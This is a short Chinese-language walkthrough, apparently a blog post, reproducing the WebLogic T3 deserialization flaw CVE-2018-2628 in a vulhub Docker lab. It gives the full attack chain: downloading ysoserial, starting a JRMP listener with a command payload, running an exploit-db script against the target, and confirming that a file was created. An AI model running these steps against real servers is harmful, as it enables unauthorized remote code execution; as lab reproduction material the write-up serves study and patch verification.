此漏洞产生于Weblogic T3服务,当开放Weblogic控制台端口(默认为7001端口)时,T3服务会默认开启,因此会造成较大影响。
漏洞编号:
CVE-2018-2628
影响范围:
> Oracle WebLogic Server10.3.6.0
>
> Oracle WebLogic Server12.2.1.2
>
> Oracle WebLogic Server12.2.1.3
>
> Oracle WebLogic Server12.1.3.0
漏洞原理:
http://www.freebuf.com/vuls/169420.html
https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
使用Nmap探测目标T3协议信息
image.png
漏洞复现:
1、首先需要下载一个国外大佬写的一款工具ysoserial(http://www.vuln.cn/6295,这里有针对这款工具的分析)。
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
2、使用ysoserial启动一个JRMP Server
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
【listen port】是JRMP Server 监听的端口
【Command】是想要执行命令
image.png
3、使用exp向目标发送数据包。(脚本链接:https://www.exploit-db.com/exploits/44553/)
zksmile@xxx:~$ python CVE-2018-2628.py
Usage:
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
[victim ip] :目标IP
[victim port] : 目标端口
[path to ysoserial] : ysoserial的路径
[JRMPListener ip] : 步骤2中 攻击机器的IP
[JRMPClient] :使用的是JRMPClient类
zksmile@xxx:~$ python CVE-2018-2628.py 172.18.0.2 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 172.18.0.1 1099 JRMPClient
image.png
4、进入docker 容器中,文件已经创建成功。
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9989f9948b12 vulhub/weblogic "startWebLogic.sh" 7 hours ago Up 7 hours 5556/tcp, 0.0.0.0:7001->7001/tcp cve-2018-2628_weblogic_1
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker exec -ti 9989f9948b12 /bin/bash
root@9989f9948b12:~/Oracle/Middleware# ls /tmp/
bea1061393648233859820.tmp hsperfdata_root wlstTemproot
cookie.txt packages zksmile.txt
root@9989f9948b12:~/Oracle/Middleware#
